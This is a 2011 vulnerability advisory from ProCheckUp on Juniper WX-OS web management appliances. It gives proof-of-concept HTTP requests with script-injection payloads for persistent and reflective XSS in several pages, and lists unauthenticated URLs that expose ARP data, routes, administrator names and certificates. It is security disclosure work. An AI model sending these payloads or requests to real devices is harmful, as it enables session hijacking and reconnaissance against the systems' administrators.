Vulnerability found:
25 April 2011
Vendor informed:
28 April 2011
Severity level:
Medium/High (Persistent Script injection)
Credits:
Richard Brain of ProCheckUp Ltd (www.procheckup.com)
Description:
ProCheckUp has found that the following classes of vulnerabilities exist within WX-OS
Unauthenticated information disclosure
Unauthenticated persistent Cross Site Scripting (XSS)
Authenticated multiple persistent and reflective Cross Site Scripting (XSS)
Successfully tested on:
Juniper Networks WX-OS
Version 5.6.8.0
Version 5.7.7.0
Model WXC500
Proof of concept:
1) Unauthenticated Persistent XSS
Persistent or stored XSS attacks are more serious than reflective XSS attacks, as the attacker does not have to trick his victims to visit his malicious page. As the malicious code is stored by and becomes part of the webpage.
a) When a maliciously constructed username is submitted to the login screen, “><script>alert(1)</script>. This is stored and requesting https:// target-domain.foo/header.htm causes the attack to be carried out.
b) The access control log does not filter malicious characters
So when a maliciously constructed username is submitted to the login screen. Say “><script>alert(1)</script>, this is stored and when the access log is viewed by a logged in administrator the malicious JavaScript will be executed
https:// target-domain.foo/acl_display.htm
Consequences:
An attacker may be able to cause execution of malicious scripting code in the browser of a user when an 'infected' page is viewed. The malicious code would run in the security context of the vulnerable website.
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: passwords or session IDs) to unauthorised third parties.
2) Authenticated Persistent XSS
Persistent or stored XSS attacks are more serious than reflective XSS attacks, as the attacker does not have to trick his victims to visit his malicious page. As the malicious code is stored by and becomes part of the webpage.
A number of Persistent or stored authenticated XSS attacks were found to exist, as numerous WX_OS programs fail to properly sanitize user supplied parameters which are then stored. Add the Content-Type: application/x-www-form-urlencoded header when submitting POST data.
a) https:// target-domain.foo/radius_server_edit.htm
i) Submit POST data
POST /radius_server_edit.htm HTTP/1.1
id=&tName=<script>alert(1)</script>&tIpAddress= 127.0.0.1&tAuthPort=1812&tTimeout=3&tRetransmit=3&tDeadTime=0&tKey=blah
ii) Then view the radius settings page for the persistent attack to be carried out.
https:// target-domain.foo/radius.htm
a) https:// target-domain.foo/alarm_new.htm
i) Submit POST data
POST /alarm_new.htm HTTP/1.1
(POST data)
hEditEvent=false&hEventId=-1&sMetric=Compression+%28%25%29&sType=Absolute&sValue=Above&thresholdValue=+&thresholdSensitivity=+&sSensitivity=Above&sApplications=ca'><script>alert(1)</script>&sClasses=-1&sSR_endpoints=-1&sNonSR_endpoints=-1&sPeriod=Hourly&sSeverity=OK
ii) Then view the alarm_definitions page for the persistent attack to be carried out.
Reflective XSS
https://target-domain.foo/alarm_definitions.htm
Consequences:
An attacker may be able to cause execution of malicious scripting code in the browser of a user when a 'infected' page is viewed. The malicious code would run in the security context of the vulnerable website.
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: passwords or session IDs) to unauthorised third parties.
3) Reflective XSS
Numerous instances of reflective XSS were found to exist after authentication; this is less serious than stored XSS as the attacker has to trick the victim to visit the page for the attack to be carried out. Add the Content-Type: application/x-www-form-urlencoded header when submitting POST data.
a) https:// target-domain.foo/tun_application_detail.htm?cBizHourFlag=Y&dn="><script>alert(1)</script>&period="><script>alert(2)</script>
b) https:// target-domain.foo/cli.htm
POST /cli.htm HTTP/1.1
(POST data)
commands=help</textarea><script>alert(1)</script>&SubmitBtn=Submit&response=
c) https:// target-domain.foo/ping.htm
POST /ping.htm HTTP/1.1
(POST data)
IpAddress=127.0.0.1<script>alert(1)</script>&PacketSize=32&PingCount=3
d) https:// target-domain.foo/realtime.htm
POST /realtime.htm HTTP/1.1
(POST data)
hProtocol=TCP&readWriteAccess=&tSourceIP=*"%3balert(1)//&tDestinationIP=*&sAppName=All&cShowRegPortName=on&tSourcePort=*&tDestinationPort=*&imgAField=TCPhProtocol="%3balert(1)//&readWriteAccess=&tSourceIP=*&tDestinationIP=*&sAppName=All&cShowRegPortName=on&tSourcePort=*&tDestinationPort=*&imgAField=TCPhProtocol=TCP&readWriteAccess=&tSourceIP=*&tDestinationIP=%3balert(1)//&sAppName=All&cShowRegPortName=on&tSourcePort=*&tDestinationPort=*&imgAField=TCP
e) https:// target-domain.foo/ospf.htm
POST /ospf.htm HTTP/1.1
(POST data)
RmOspfAreaId=<BODY onLoad="alert(1)"> &RmOspfAuthMethod=V1&password=&RmOspfKeyId=&RmOspfKey=
f) https:// target-domain.foo/radius_server_edit.htm
POST /radius_server_edit.htm HTTP/1.1
(POST data)
id=&tName=><script>alert(1)</script>&tIpAddress=127.0.0.1&tAuthPort=1812&tTimeout=3&tRetransmit=3&tDeadTime=0&tKey=blah
Consequences:
An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link or visits a
malicious webpage. The malicious code would run in the security context of the vulnerable website.
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: passwords or session IDs) to unauthorised third parties.
4) Information disclosure
A large number of programs can be accessed without authentication, even though the information disclosed was classified at most as medium severity (Internal IP’s, Admin username and machine name).
For instance requesting the URL
https:// target-domain.foo/csv/arp.csv
Discloses the IP addresses of interfaces, the client machines IP and MAC addresses which have accessed the device
Other files are also unprotected within the /csv/ directory
https:// target-domain.foo/csv/ip-flow.csv
https:// target-domain.foo/csv/localrt.csv (seems to displays routes)
Requesting
https:// target-domain.foo/header.htm
Discloses machine name, name of administrator currently logged on, and disk status.
Other files within the web interface which do not require authentication
https:// target-domain.foo /executive.htm
https:// target-domain.foo/ssl_certificates.htm (certificates listed)
https:// target-domain.foo/ssl_certificates_import.htm
https:// target-domain.foo/ssl_certificates_view.htm (view certificates)
https:// target-domain.foo/tacacs_server_edit.htm
https:// target-domain.foo/quick_demo.htm
https:// target-domain.foo/cli.htm?commands=help
https:// target-domain.foo/app_accl_ssl.htm
https:// target-domain.foo/header_preservation.htm
https:// target-domain.foo/ipsec_applications.htm
https:// target-domain.foo/ipsec_wiz_custom_apps.htm
https:// target-domain.foo/legend_app_overview.htm
https:// target-domain.foo/prompt_performance.htm
https:// target-domain.foo/virtual_endpoints.htm
Consequences:
Any unnecessarily information disclosure might lead to further attacks.
How to fix:
In October 2012 obsoleted WX-OS, replacing it with Riverbed appliances.
Legal:
Copyright 2011 - 2013 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to ProCheckUp, and provided such reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. ProCheckUp is not liable for any misuse of this information by any third party.
Categories